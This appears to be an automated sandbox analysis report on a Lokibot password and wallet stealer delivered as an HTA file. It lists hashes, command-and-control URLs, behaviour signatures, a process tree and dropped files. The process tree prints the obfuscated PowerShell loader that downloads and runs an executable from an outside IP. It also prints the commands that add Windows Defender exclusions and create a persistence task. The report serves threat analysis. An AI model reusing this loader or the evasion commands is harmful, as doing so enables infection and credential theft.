Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 07:35

General

  • Target

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta

  • Size

    178KB

  • MD5

    4ce3b0e612e1968b6c491ab1ab818884

  • SHA1

    cbc890a816e9b7e993c90fb63d51526a76616323

  • SHA256

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0

  • SHA512

    9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816

  • SSDEEP

    96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1056
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:112
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3024
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1968
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2244

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp

    Filesize

    1KB

    MD5

    1629b742fe9bb12ee231b3cf19c56c75

    SHA1

    eea0867318da1607efac26814417f02f4143e373

    SHA256

    0e8b76d9c7446dd4b7612c1ef4c42697508915df84119deb8ebf7db29843796e

    SHA512

    badd29397ad0aa758138b7b2c2419aa607b51adcd9b8a04f7ed20cafbe268550065a4337b3a7c7773f105988eac88585f4f7a218a9ce98cf36b13bfb308995c7

  • C:\Users\Admin\AppData\Local\Temp\hs07zwtj.dll

    Filesize

    3KB

    MD5

    b45173682a7449f2b958017b4acec059

    SHA1

    900a06b161ba8675f40b698b0d2cfe6120b169c6

    SHA256

    f0b2b5ee2383e6470967e412b5a6000c3e7d2ad6e700513cebbc07719e2c1a6e

    SHA512

    1105b44b3820178fb46fa265e5ff401ac53f3e979e3cd5f6a2c2c29f426325fd6faf16ada178f0e9becfef8c7e3cbbd3dffd68adcaf63ec5609b0c7d1da157a2

  • C:\Users\Admin\AppData\Local\Temp\hs07zwtj.pdb

    Filesize

    7KB

    MD5

    9e16775089f02993bcd37f5ecfc46785

    SHA1

    1116e44a47e0adc235d054081386bb617933d42b

    SHA256

    ea8bf6580c01da53bc451ffa25fced942fbe68f3ed2e70341f0066c06ee965fb

    SHA512

    9655eb77c2057471f80a538385887929bdbbf23868e6a9d316da60d7e104e6a793578c3ffc46d66604fdd21fa1030a3d34276c4011781b549d6048326821712a

  • C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp

    Filesize

    1KB

    MD5

    1b67e8cceed149b21087e5f364860141

    SHA1

    38836c472a49a5b993bf43b87b8c345961e3a0d9

    SHA256

    5d0543738b465abe90478a6ceeacff369ccd6b9edfcd686f1f75a9f3adc9784c

    SHA512

    791c32dd134067ebc489032b0a87abb901790bd2218596f39bc2c9bd520ef0cc549956da3d06f6f2c55679321ed41289005aade54a7ccab85030f9c41b3daa7c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    511c43e75c660df11a98089d2e722ac8

    SHA1

    29b4b67e219af20e607ed6eb4fb23e734bf31aeb

    SHA256

    9048bc13b8c28e44128a61ff7c76415f52420853bf01dbebaf501eb03ee584b0

    SHA512

    e93c17a8fd030615db054a4478337cab201779735bcfb2639c8ed723c16b3728e001811a1a236357391e497d3a349e9d9a05278c28816be28d57be8df959f977

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp

    Filesize

    652B

    MD5

    08231841e49d0ff1e44000a2138277d4

    SHA1

    7b33e37d162578c4da5f4bff81e299bf58158b95

    SHA256

    4cd2cb49122215ee415c3d7272d2bb48f2d2415638bc063dbec22f12d1412fb8

    SHA512

    8996d94dae69d179c83e874d9453c95bc9ccd637ce5a8a4de64ccc5117c3bc5179805949a6d348c3ecc4afb6a4e76abfce3ee69dddfe281aec9e882dadd243c8

  • \??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline

    Filesize

    309B

    MD5

    3e99a2c1b3a3cfdd8870f044bbe0ae07

    SHA1

    f57021d4745ce760b37e2806ca6ebc9dbe9d47fd

    SHA256

    740a640a03f70647d38fe6fd169a9c4371ad82cfc206d12665515f1db7a08ec3

    SHA512

    306642a7c023135a30eb2b2ced06aaf7dbebf2ffd0f3a02195ab1298c54cbbbfbab003f96fa265aa4b8472a0b1876fe6aab94620ce13935bf02ed4b3cb983643

  • memory/2244-58-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-54-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-67-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-65-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2244-62-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-60-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-56-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-86-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2244-95-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2640-37-0x0000000004BC0000-0x0000000004C24000-memory.dmp

    Filesize

    400KB

  • memory/2640-36-0x0000000000390000-0x00000000003A2000-memory.dmp

    Filesize

    72KB

  • memory/2640-35-0x0000000001350000-0x00000000013E8000-memory.dmp

    Filesize

    608KB